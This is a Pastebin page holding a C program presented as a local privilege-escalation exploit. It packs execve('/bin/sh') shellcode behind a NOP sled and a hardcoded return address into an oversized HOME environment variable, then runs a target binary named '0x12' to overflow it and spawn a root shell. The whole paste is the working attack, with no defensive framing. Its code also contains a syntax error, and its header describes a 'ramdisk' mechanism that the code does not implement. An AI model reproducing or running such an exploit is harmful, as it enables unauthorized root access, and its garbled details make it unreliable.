API tools faq
paste
Guest User

Untitled

a guest
May 26th, 2018
205
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.28 KB | None | 0 0
raw download clone embed print report
  1. /********************************************************************************/
  2. /* 0x12 (sh1ts4uce) exploit by phyrrus9 */
  3. /* Copyright(c) 2012 phyrrus9 and the Private Dev Team */
  4. /* */
  5. /*This program will execute a standard buffer overflow and spawn a root shell by*/
  6. /*using a standard ramdisk block with the placement of NOP characters at needed */
  7. /*locations allowing the device to jump straight to the shell execution code and*/
  8. /*spawn the root shell. This is then handled by some other magical force in the*/
  9. /*universe. This code is NOT public, and shall never be as I dont want to show */
  10. /*anybody the work I do because I am a lazy asshole and you can just shove it if*/
  11. /*you have a problem about it. Have a nice day and thank you for your time!!!!!*/
  12. /* */
  13. /* If you have questions or concerns, email me at <phyrrus9@gmail.com> */
  14. /********************************************************************************/
  15. #include <stdio.h>
  16. #include <unistd.h>
  17. #include <stdlib.h>
  18. static char shellcode[]=
  19. "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
  20. "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
  21. #define NOP 0x90
  22. #define LEN 1032
  23. #define RET 0xbffff574
  24. int main()
  25. {
  26. fprintf(stderr, "Initializing 0x21");
  27. char buffer[LEN];
  28. long retaddr = RET;
  29. int i;
  30. fprintf(stderr, "============================");
  31. fprintf(stderr, "Initialized!!!!!");
  32. fprintf(stderr,"using address 0x%lx\n",retaddr);
  33. fprintf(stderr, "Preload begin stage one ");
  34. /*flood*/
  35. for (i=0;i<LEN;i+=4)
  36. *(long *)&buffer[i] = retaddr;
  37. fprintf(stderr, "flooded buffer with returns ");
  38. fprintf(stderr, "begin stage two ");
  39. /* a little puzzle piecing */
  40. for (i=0;i<LEN-strlen(shellcode)-100);i++)
  41. *(buffer+i) = NOP;
  42. fprintf(stderr, "placed padding on exploit ");
  43. fprintf(stderr, "begin stage three ");
  44. /* place the exploit */
  45. memcpy(buffer+i,shellcode,strlen(shellcode));
  46. fprintf(stderr, "copied exploit to ramdisk ");
  47. fprintf(stderr, "begin stage four ");
  48. setenv("HOME", buffer, 1);
  49. fprintf(stderr, "Final stage begin ");
  50. fprintf(stderr, "Execute exploit and spawn #");
  51. execlp("0x12","0x12",NULL);
  52. return 0;
  53. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!